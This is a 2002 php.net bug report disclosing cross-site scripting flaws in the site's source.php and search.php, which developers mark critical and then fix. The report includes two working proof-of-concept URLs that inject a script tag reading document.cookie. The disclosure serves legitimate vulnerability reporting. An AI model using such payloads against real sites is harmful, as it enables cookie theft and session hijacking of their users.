php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #16258 Cross-Site scripting in php.net
Submitted: 2002-03-25 08:57 UTC Modified: 2002-03-25 14:23 UTC
Votes:1
Avg. Score:2.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: nopman at hackermail dot com Assigned:
Status: Closed Package: Website problem
PHP Version: 4.1.2 OS: Unix
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
(description)
Block user comment
Status: Assign to:
Package:
Bug Type:
Summary:
From: nopman at hackermail dot com
New email:
PHP Version: OS:

 

 [2002-03-25 08:57 UTC] nopman at hackermail dot com 
There is a Cross-Site scripting problem in source.php and
search.php.
One can enter following URL:
http://www.php.net/source.php?url=/<script>alert(document.cookie)</script><!--.html
And following will also work:
http://www.php.net/search.php?show=nosource&auto=1&pattern=dfighdfughfg&base="><script>alert(document.cookie)</script><!--

Regards,
NopMan

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-03-25 09:00 UTC] sander@php.net 
Marking as critical.
 [2002-03-25 14:23 UTC] jimw@php.net 
This bug has been fixed in CVS.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Wed Jun 26 14:01:32 2024 UTC